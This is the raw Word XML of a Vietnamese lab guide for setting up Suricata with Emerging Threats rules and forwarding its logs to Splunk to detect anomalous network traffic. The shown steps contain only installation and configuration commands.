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281E4" w14:textId="6F07BBF7" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidR="007B31F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - Thiết lập hệ thống giám sát mạng bằng Suricata và Splunk để phát hiện các hành vi bất thường trong lưu lượng mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519DCA7F" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6E3ECA" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Thiết lập một hệ thống giám sát mạng để phát hiện các mẫu lưu lượng bất thường, bao gồm cả việc xâm nhập dữ liệu và giao tiếp command-and-control (C2), bằng cách sử dụng Suricata với các quy tắc Emerging Threats (ET) và phân tích nhật ký bằng Splunk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B9077" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Mô phỏng một cuộc tấn công dựa trên mạng và phản ứng với các cảnh báo được tạo bởi các quy tắc ET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E921134" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Sơ đồ mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AAC7FD" w14:textId="15FEF8CF" w:rsidR="00E45A0B" w:rsidRDefault="00C207EE" w:rsidP="00E45A0B">
      <w:r>
        <w:t>Ubuntu Server (SplunkUniversalForwarder, Suricata): 192.168.56.105/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFDDA3" w14:textId="0B53A039" w:rsidR="00C207EE" w:rsidRDefault="00C207EE" w:rsidP="00E45A0B">
      <w:r>
        <w:t>Kali (Attacker): 192.168.56.101/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A203A75" w14:textId="18592EDD" w:rsidR="004F3931" w:rsidRPr="00E45A0B" w:rsidRDefault="004F3931" w:rsidP="00E45A0B">
      <w:r>
        <w:t>Ubuntu (Splunk Server):  192.168.46.104/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7156C" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Kiến thức nền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D81E9" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Suricata:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> Là một công cụ giám sát mạng và phát hiện xâm nhập (IDS) mạnh mẽ. Nó phân tích lưu lượng mạng theo thời gian thực và có thể phát hiện các hoạt động độc hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BDB1E5" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Emerging Threats (ET) Rules:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> Một bộ quy tắc nguồn mở được sử dụng với Suricata để phát hiện nhiều loại mối đe dọa, bao gồm phần mềm độc hại, giao tiếp C2 và xâm nhập dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E678D" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Splunk Universal Forwarder:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> Một thành phần của Splunk, được cài đặt trên các máy chủ để thu thập và chuyển tiếp nhật ký đến một Splunk Server trung tâm để phân tích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B73907" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Splunk:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> Một nền tảng phần mềm mạnh mẽ để tìm kiếm, phân tích và trực quan hóa dữ liệu nhật ký. Nó cho phép các nhà phân tích bảo mật xác định các xu hướng, điều tra sự cố và giám sát hoạt động của mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7113B335" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Các bước tiến hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEE726" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1: Chuẩn bị môi trường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B86700C" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve">Tải và cài đặt máy ảo Ubuntu Server 22.04 và Kali Linux 2025.1a qua VMware Player. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8574FF" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ubuntu Server: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00E45A0B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="pt-BR"/>
          </w:rPr>
          <w:t>https://releases.ubuntu.com/jammy/ubuntu-22.04.5-live-server-amd64.iso</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DE61F32" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00E45A0B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="pt-BR"/>
          </w:rPr>
          <w:t>https://cdimage.kali.org/kali-2025.1a/kali-linux-2025.1a-vmware-amd64.7z</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6047A2B8" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện cài đặt, cấu hình Splunk Server trên Windows và Splunk Universal Forwarder trên Ubuntu Server theo hướng dẫn tại: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00E45A0B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="pt-BR"/>
          </w:rPr>
          <w:t>https://github.com/0xrajneesh/90-days-security-challenge/blob/main/Challenge%231/Lab</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set up.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373A59B7" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Bước 2: Cài đặt và cấu hình Suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54909865" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cài đặt Suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A334F81" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>sudo add-apt-repository ppa:oisf/suricata-stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7DE886" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>sudo apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524E1C4B" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>sudo apt-get install suricata -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A04B41" w14:textId="4D4A5FD9" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F18703A" wp14:editId="495B43F1">
            <wp:extent cx="5943600" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16096218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43000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3573C692" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bật các quy tắc Emerging Threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35958D3B" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Tải xuống các quy tắc ET bằng công cụ Oinkmaster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557E122" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /tmp/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5764A0E1" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>curl -LO &lt;https://rules.emergingthreats.net/open/suricata-7.0.3/emerging.rules.tar.gz&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7CB52C" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tar -xvzf emerging.rules.tar.gz </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3F463B" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo mkdir /etc/suricata/rules </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7618D4" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>sudo mv rules/*.rules /etc/suricata/rules/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A35D3A" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>sudo chmod 640 /etc/suricata/rules/*.rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C363D" w14:textId="3D88821C" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FDCB93F" wp14:editId="55B28AED">
            <wp:extent cx="5934075" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="10081127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390775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF99688" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Cập nhật cấu hình Suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0810A71E" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Mở tệp cấu hình Suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E7D6DC" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>sudo nano /etc/suricata/suricata.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362A68CD" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Cập nhật HOME_NET, EXTERNAL_NET, rule-path và rule-files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140340C4" w14:textId="7FE4DCFF" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="530E6AE2" wp14:editId="59DEEFDC">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="573334205"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E8BD5"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53B9836" wp14:editId="63A65A58">
            <wp:extent cx="5934075" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="537913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981200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD863D6" w14:textId="1542F1FD" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B28F233" wp14:editId="1B292A28">
            <wp:extent cx="5934075" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7284758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847850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B274B8C" wp14:editId="79B9A71D">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1453150713"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AB874"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AF145" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khởi động lại và kiểm tra cấu hình Suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6286A673" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>sudo systemctl restart suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AC876E" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>sudo systemctl start suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD47841" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>sudo systemctl enable suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651621AA" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>sudo systemctl status suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D165E9C" w14:textId="320BCD9F" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00F51FA4" w:rsidP="00E45A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09DC26D4" wp14:editId="64BA4E88">
            <wp:extent cx="5943600" cy="3135630"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="18089941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4143" name="Picture 1808994143"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">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7E385711" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3: Cấu hình Splunk Forwarder theo dõi log của Suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5271238E" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chỉnh sửa tệp cấu hình đầu vào của Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596DEC81" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Mở tệp cấu hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6916FC9C" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:lastRenderedPageBreak/>
        <w:t>sudo nano /opt/splunkforwarder/etc/system/local/inputs.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E5CE28" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Thêm mục sau để giám sát log của Suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58229412" w14:textId="1ECDE747" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17DA2C7B" wp14:editId="62FD3A60">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="951674397"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19242"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8122C65" wp14:editId="613DE6D8">
            <wp:extent cx="5934075" cy="3305175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="14802650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3305175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
